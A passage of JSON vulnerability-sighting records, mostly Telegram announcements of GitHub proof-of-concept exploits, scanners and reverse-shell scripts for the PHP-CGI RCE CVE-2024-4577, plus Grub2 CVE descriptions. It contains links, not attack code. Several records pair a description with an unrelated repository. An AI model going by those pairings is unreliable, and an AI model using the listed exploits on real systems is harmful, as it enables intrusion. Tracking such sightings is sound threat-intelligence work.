"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a\u5168\u7403\u9996\u6b3e\u5229\u7528PHP\u9ed8\u8ba4\u73af\u5883\u7684CVE-2024-4577 PHP-CGI RCE \u6f0f\u6d1e EXP\nURL\uff1ahttps://github.com/xcanwin/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-08T13:07:28.000000Z"}, {"uuid": "a2e74be4-4309-4391-88df-07e40f2059ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7572", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC for CVE-2024-4577 written in bash, go, python and a nuclei template\nURL\uff1ahttps://github.com/ZephrFish/CVE-2024-4577-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-08T12:26:24.000000Z"}, {"uuid": "bdcc36ec-7f9d-452e-b1b5-eea94bcf39b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7570", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 Exploit POC \nURL\uff1ahttps://github.com/zomasec/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-08T06:40:02.000000Z"}, {"uuid": "a744e9d9-fb1d-4c14-b030-adaee543d40b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/GithubRedTeam/8309", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) RCE\nURL\uff1ahttps://github.com/almogopp/Disable-IPv6-CVE-2024-38063-Fix\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-20T08:52:27.000000Z"}, {"uuid": "c87720c0-8f7e-4f55-aadb-3ba724ea7a88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8305", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) RCE\nURL\uff1ahttps://github.com/fa-rrel/CVE-2024-4577-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-08-20T03:04:23.000000Z"}, {"uuid": "8dd0a991-b520-48d4-9860-bbf47922e1ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8304", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) RCE\nURL\uff1ahttps://github.com/fa-rrel/-CVE-2024-4577-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-20T02:59:15.000000Z"}, {"uuid": "aa630bc2-0100-4d09-857f-e3343fe448f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45778", "type": "seen", "source": "https://t.me/cvedetector/19389", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45778 - Grub2 Stack Overflow Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45778 \nPublished : March 3, 2025, 5:15 p.m. | 1\u00a0hour, 1\u00a0minute ago \nDescription : A stack overflow flaw was found when reading a BFS file system. A crafted BFS filesystem may lead to an uncontrolled loop, causing grub2 to crash. \nSeverity: 4.1 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-03T19:44:21.000000Z"}, {"uuid": "9e5a622b-6af5-4c14-9c5e-05d73ae1d9f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7619", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-4577 with Shodan integration\nURL\uff1ahttps://github.com/d3ck4/Shodan-CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-12T06:51:37.000000Z"}, {"uuid": "610b4570-4423-416e-b728-914310522664", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7671", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPython script for get reverse shell with using CVE-2024-4577\nURL\uff1ahttps://github.com/team-MineDEV/CVE-2024-26229\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-16T05:09:56.000000Z"}, {"uuid": "e643efba-7d3e-43aa-a2d6-a0359a53b2c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7875", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 Exploits\nURL\uff1ahttps://github.com/cybersagor/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T12:49:34.000000Z"}, {"uuid": "7660c69b-789f-413e-a3c6-df6abe5f6960", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7776", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577\nURL\uff1ahttps://github.com/olebris/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-28T10:22:00.000000Z"}, {"uuid": "791849b8-3943-406a-83cf-c2586a370176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8510", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aScanning CVE-2024-4577 vulnerability with a url list.\nURL\uff1ahttps://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-11T13:54:18.000000Z"}, {"uuid": "d6082ceb-2bc2-4bf5-9bad-a6b1126ab2e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://t.me/cvedetector/19357", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45779 - Grub2 BFS File System Driver Integer Overflow Heap Bounds Read\", \n  \"Content\": \"CVE ID : CVE-2024-45779 \nPublished : March 3, 2025, 3:15 p.m. | 59\u00a0minutes ago \nDescription : An integer overflow flaw was found in the BFS file system driver in grub2. When reading a file with an indirect extent map, grub2 fails to validate the number of extent entries to be read. A crafted or corrupted BFS filesystem may cause an integer overflow during the file reading, leading to a heap of bounds read. As a consequence, sensitive data may be leaked, or grub2 will crash. \nSeverity: 4.1 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-03T18:03:34.000000Z"}, {"uuid": "dc01e034-9059-462c-8794-d64d318b1af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7892", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploitation)\nURL\uff1ahttps://github.com/l0n3m4n/CVE-2024-4577-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-07-06T19:46:53.000000Z"}, {"uuid": "05e81889-14be-4669-8497-26182566be11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7852", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 EXP\nURL\uff1ahttps://github.com/charis3306/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-03T15:36:37.000000Z"}, {"uuid": "db7bfba2-76b4-41bb-a9ae-1c67d749d6e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/TB3NLbe90J8QUxkWKTQOkDSFbwNPZ-_U22O-dUZH71QZlq8", "content": "", "creation_timestamp": "2025-06-15T15:00:07.000000Z"}, {"uuid": "a21394af-5c72-4f8c-8c27-00152d35346a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8277", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 Exploits\nURL\uff1ahttps://github.com/bughuntar/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-17T02:06:11.000000Z"}, {"uuid": "e231b9d7-035d-4fec-b6a7-8eb05d3bfdb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8002", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC\nURL\uff1ahttps://github.com/PizzaboiBestLegits/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-17T11:04:48.000000Z"}, {"uuid": "202b1f17-1d2e-43cc-b59a-d7c8b2f70232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "ef0017e7-5d37-4eac-a45b-ae1bf2049876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/GithubRedTeam/8311", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Argument Injection (CVE-2024-4577) RCE\nURL\uff1ahttps://github.com/almogopp/OpenSSH-CVE-2024-6387-Fix\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-20T10:00:56.000000Z"}, {"uuid": "a4fe6b6c-64c5-4380-b67a-3d625e73a87d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45778", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6243", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45778\n\ud83d\udd25 CVSS Score: 4.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A stack overflow flaw was found when reading a BFS file system. A crafted BFS filesystem may lead to an uncontrolled loop, causing grub2 to crash.\n\ud83d\udccf Published: 2025-03-03T17:05:13.058Z\n\ud83d\udccf Modified: 2025-03-03T17:23:56.731Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45778\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2345640", "creation_timestamp": "2025-03-03T17:31:25.000000Z"}, {"uuid": "e9dab06e-0e1f-4ad8-87de-ecd0fc83c1fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/php_cve_2024_4577", "content": "", "creation_timestamp": "2024-12-19T10:44:16.000000Z"}, {"uuid": "34d0930e-4149-40b2-a0a2-260cec84a610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13075", "content": "\ud83c\udf0f PHP just fixed RCE vulnerabilities, which affects XAMPP by default.\n\nCVE-2024-4577: Make PHP-CGI Argument Injection Great Again!\n\nhttps://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html", "creation_timestamp": "2024-06-07T08:37:00.000000Z"}, {"uuid": "73e1c635-720d-4963-86bd-d1691bd7acfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-19)", "content": "", "creation_timestamp": "2026-04-19T00:00:00.000000Z"}, {"uuid": "9ee76ad7-bdc6-4030-a3af-8864862df634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8448", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAutomated PHP remote code execution scanner for CVE-2024-4577\nURL\uff1ahttps://github.com/BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-09-03T16:07:40.000000Z"}, {"uuid": "b3bbee89-6fb2-456a-81e1-8d29a23b2612", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8461", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAutomated PHP remote code execution scanner for CVE-2024-4577\nURL\uff1ahttps://github.com/absholi7ly/LiteSpeed-Cache-CVE-2024-44000-\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-10T04:33:38.000000Z"}, {"uuid": "b773b6c4-c5e6-461a-b9ee-418a905faf61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45777", "type": "seen", "source": "https://t.me/cvedetector/18451", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45777 - Grub2 Out-of-bound Write Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45777 \nPublished : Feb. 19, 2025, 6:15 p.m. | 23\u00a0minutes ago \nDescription : A flaw was found in grub2. The calculation of the translation buffer when reading a language .mo file in grub_gettext_getstr_from_position() may overflow, leading to a Out-of-bound write. This issue can be leveraged by an attacker to overwrite grub2's sensitive heap data, eventually leading to the circumvention of secure boot protections. \nSeverity: 6.7 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-19T20:24:50.000000Z"}, {"uuid": "ee47e41a-d12e-41c8-a4aa-3ec6958b1dd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45774", "type": "seen", "source": "https://t.me/cvedetector/18346", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45774 - Grub2 JPEG Buffer Overflow Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45774 \nPublished : Feb. 18, 2025, 7:15 p.m. | 39\u00a0minutes ago \nDescription : A flaw was found in grub2. A specially crafted JPEG file can cause the JPEG parser of grub2 to incorrectly check the bounds of its internal buffers, resulting in an out-of-bounds write. The possibility of overwriting sensitive information to bypass secure boot protections is not discarded. \nSeverity: 6.7 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-18T20:59:44.000000Z"}, {"uuid": "efe62016-2505-49a8-a574-02e36a087af8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7992", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAutomated PHP remote code execution scanner for CVE-2024-4577\nURL\uff1ahttps://github.com/waived/CVE-2024-4577-PHP-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-15T21:36:53.000000Z"}, {"uuid": "1794b785-7bb2-47e2-a327-ef958bc96d2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8672", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA Bash script designed to scan multiple domains for the CVE-2024-4577 vulnerability in PHP-CGI.\nURL\uff1ahttps://github.com/JeninSutradhar/CVE-2024-4577-checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-04T13:12:01.000000Z"}, {"uuid": "157a5465-1dc2-4f2f-9d8b-64b654e9d673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7587", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aA PoC exploit for CVE-2024-4577 - PHP CGI Argument Injection Remote Code Execution\nURL\uff1ahttps://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-06-10T11:00:34.000000Z"}, {"uuid": "828e4482-f909-48e7-9a63-f25286cd6545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7585", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBash script that checks if a PHP CGI setup is vulnerable to the CVE-2024-4577 argument injection vulnerability\nURL\uff1ahttps://github.com/it-t4mpan/check_cve_2024_4577.sh\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-10T07:31:08.000000Z"}, {"uuid": "8705bced-488f-4d6f-84e5-bf6e3ece3557", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7938", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aATTACK PoC - PHP CVE-2024-4577 \nURL\uff1ahttps://github.com/bibo318/CVE-2024-4577-RCE-ATTACK\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T02:26:42.000000Z"}, {"uuid": "6c8bc2cc-16f4-47e6-a065-e32f289bcba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7645", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aFixed and minimalist PoC of the CVE-2024-4577\nURL\uff1ahttps://github.com/Sh0ckFR/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-13T14:31:22.000000Z"}, {"uuid": "fd8b3b60-1b84-4278-9828-48469f6afad3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7670", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPython script for get reverse shell with using CVE-2024-4577\nURL\uff1ahttps://github.com/AlperenY-cs/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-15T21:19:46.000000Z"}, {"uuid": "0c9e3452-7c78-40fc-8325-c7d3ba0ccc09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/hackingbra/159", "content": "CVE-2024-4577:\nMake PHP-CGI Argument Injection\nhttps://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability\n]-> https://github.com/watchtowrlabs/CVE-2024-4577\n\nCVE-2024-5171:\nlibaom Video Codec Library Vulnerability\nhttps://issues.chromium.org/issues/332382766", "creation_timestamp": "2024-06-07T12:42:08.000000Z"}, {"uuid": "68ec90bf-1bfb-47f2-b172-edfb8a50d211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8952", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aServerside Template Injection (SSTI) RCE - THM challenge \\\"whiterose\\\"    \nURL\uff1ahttps://github.com/l0n3m4n/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-05T06:17:57.000000Z"}, {"uuid": "89f40f05-17f6-4e35-a016-96ed7a186661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8959", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4577 RCE PoC\nURL\uff1ahttps://github.com/BTtea/CVE-2024-4577-RCE-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-11T16:37:03.000000Z"}, {"uuid": "12bb24ea-97f8-4307-bd67-cd87e0aa409a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9040", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2024-4577 RCE PoC\nURL\uff1ahttps://github.com/d3sca/CVE-2024-52302\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-11-15T10:23:45.000000Z"}, {"uuid": "522028ce-ddd3-4cb4-9639-c4f41a2c8564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/nMbAd6BvmvB3iD9PlODPrdfskinOrz3VLFN5QeFD0VXs3VY", "content": "", "creation_timestamp": "2024-11-13T02:00:01.000000Z"}, {"uuid": "22a12d78-a718-46a8-98fe-8f180c958a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": 